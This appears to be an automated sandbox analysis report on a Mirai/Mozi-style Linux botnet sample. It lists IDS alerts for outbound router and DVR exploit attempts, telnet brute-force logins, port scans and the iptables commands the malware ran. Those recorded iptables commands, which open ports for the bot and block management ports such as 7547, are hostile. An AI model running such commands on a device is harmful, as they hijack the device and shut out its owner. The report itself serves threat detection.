                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 187.103.124.110: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.43.107.137: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.95.211.247: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.231.144.28: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.213.211.120: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.54.120.139: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.215.70: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.12.98: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.167.25: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.255.195.11: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.208.68.59: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 109.206.193.130: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 47.229.50.113: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.131.13.8: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 201.10.209.246: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38662 -> 193.176.117.172:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38662 -> 193.176.117.172:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.135.233.46: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.170.129.57: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.181: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54674
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54678
                Source: TrafficSnort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.20:54678 -> 86.125.215.125:23
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54680
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54682
                Source: TrafficSnort IDS: 2023443 ET TROJAN Possible Linux.Mirai Login Attempt (klv123) 192.168.2.20:54682 -> 86.125.215.125:23
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54684
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54722
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54730
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.227.188.172: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54734
                Source: TrafficSnort IDS: 2023439 ET TROJAN Possible Linux.Mirai Login Attempt (hi3518) 192.168.2.20:54734 -> 86.125.215.125:23
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.91.11.89: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54946
                Source: TrafficSnort IDS: 2023436 ET TROJAN Possible Linux.Mirai Login Attempt (anko) 192.168.2.20:54946 -> 86.125.215.125:23
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56306 -> 159.138.143.231:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56306 -> 159.138.143.231:80
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54956
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.54.37.162: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.196.195.2: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54968
                Source: TrafficSnort IDS: 2023434 ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0vizxv) 192.168.2.20:54968 -> 86.125.215.125:23
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54970
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54976
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54978
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.165.153.254: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54980
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 208.126.19.231: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 68.115.35.242: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 107.165.48.81: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.89.78.198: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.221.96.235: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:38558 -> 216.92.218.45:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:38558 -> 216.92.218.45:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.144.22.98: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.165.152: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.167.170: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.223.209.67: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.234.234.92: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.39.200.252: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 200.155.33.253: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.211.141.231: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.231.46.84: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 92.61.32.163: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.99.69: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 114.231.120.179: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.142.250.140: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 10.220.105.45: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50210 -> 23.6.11.241:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50210 -> 23.6.11.241:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.11.241:80 -> 192.168.2.20:50210
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.72.254.150: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.206.175.206: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 141.64.0.6: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.26.181.228:8080 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.142.250.149: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.94.155: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:50454 -> 69.195.90.130:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:50454 -> 69.195.90.130:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57946 -> 184.29.252.151:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57946 -> 184.29.252.151:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.29.252.151:80 -> 192.168.2.20:57946
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.230.193.38: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41912 -> 52.192.234.143:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41912 -> 52.192.234.143:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.37.98.208: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.154.84.219: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33260 -> 3.11.29.16:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41564 -> 120.25.215.76:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41564 -> 120.25.215.76:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35870 -> 47.108.201.233:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35870 -> 47.108.201.233:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.201.101.67: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.132.248.162: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38446 -> 156.244.87.14:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38446 -> 156.244.87.14:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.215.27.127: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.164.160.90: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.138.217:65176 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.117.123.50: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.77.221.73: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53946 -> 142.92.252.36:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53946 -> 142.92.252.36:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.39.15: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.116.90.98: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.161.95.20: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.23.114:1900 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 103.41.25.150:54444 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.201.195.174:4000 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33316 -> 23.223.90.123:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33316 -> 23.223.90.123:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.223.90.123:80 -> 192.168.2.20:33316
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.166.157.83: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.25.228.4: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.181.148:4000 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:47544 -> 23.61.13.112:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:47544 -> 23.61.13.112:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.61.13.112:80 -> 192.168.2.20:47544
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37564 -> 81.2.194.201:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37564 -> 81.2.194.201:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60742 -> 13.58.205.33:8080
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60742 -> 13.58.205.33:8080
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:46956 -> 51.182.50.200:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:46956 -> 51.182.50.200:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40652 -> 104.72.178.146:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40652 -> 104.72.178.146:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.72.178.146:80 -> 192.168.2.20:40652
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.236.70: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.228.33.143: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.140.79: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59032 -> 85.23.70.174:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59032 -> 85.23.70.174:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59348 -> 95.217.3.9:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59348 -> 95.217.3.9:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38708 -> 204.85.28.95:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38708 -> 204.85.28.95:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36964 -> 47.96.100.38:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36964 -> 47.96.100.38:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40456 -> 35.201.127.68:8080
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40456 -> 35.201.127.68:8080
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 193.136.134.150: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 163.28.1.241: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.93.139: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.183.25.195: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44746 -> 220.130.214.100:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:34312 -> 121.5.104.125:80
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 46.254.1.124 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 217.196.154.24 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 77.190.22.139 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 26.95.223.242 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 34.46.25.239 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 138.94.203.237 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 160.49.32.226 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 92.171.56.228 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 82.134.248.77 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 199.218.221.131 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 159.162.153.137 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 26.139.153.168 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 142.143.222.228 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 14.106.178.189 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 129.177.173.85 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 158.130.170.201 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 185.57.154.59 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 180.142.151.223 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 70.83.19.226 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 148.228.211.150 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 218.1.134.21 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 181.215.101.174 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 6.158.170.206 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 85.124.222.42 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 165.94.66.173 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 84.49.20.203 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 126.241.242.120 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 148.53.105.39 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 163.224.207.250 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 47.83.189.211 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 186.149.104.105 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 105.109.18.186 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 83.190.231.93 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 113.203.125.76 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 96.186.107.158 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 113.37.245.122 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 94.202.222.110 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 29.5.215.81 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 132.228.243.137 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 77.188.2.23 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 160.116.99.47 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 24.87.139.212 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 204.7.247.28 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 137.33.28.160 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 113.237.9.87 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 4.122.58.30 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 174.9.64.0 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 56.89.187.128 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 182.150.145.27 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 180.195.241.242 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 61.67.234.110 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 189.124.245.91 ports 1,2,3,5,7,37215
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4616)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4650)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4653)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4690)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4716)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4748)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4793)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4796)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4805)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4829)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4878)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4906)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4926)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4931)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4947)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4974)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5000)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5025)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5034)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5057)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5087)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5117)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5120)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5127)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5152)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5182)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5231)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5234)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 47738 -> 8443
                Source: global trafficTCP traffic: 192.168.2.20:34160 -> 140.39.206.54:81
                Source: global trafficTCP traffic: 192.168.2.20:60110 -> 108.39.69.131:8443
                Source: global trafficTCP traffic: 192.168.2.20:47760 -> 131.99.110.247:81
                Source: global trafficTCP traffic: 192.168.2.20:38738 -> 3.51.62.125:8080
                Source: global trafficTCP traffic: 192.168.2.20:33152 -> 28.86.70.243:8443
                Source: global trafficTCP traffic: 192.168.2.20:52282 -> 171.112.221.128:8080
                Source: global trafficTCP traffic: 192.168.2.20:38246 -> 85.117.188.205:8080
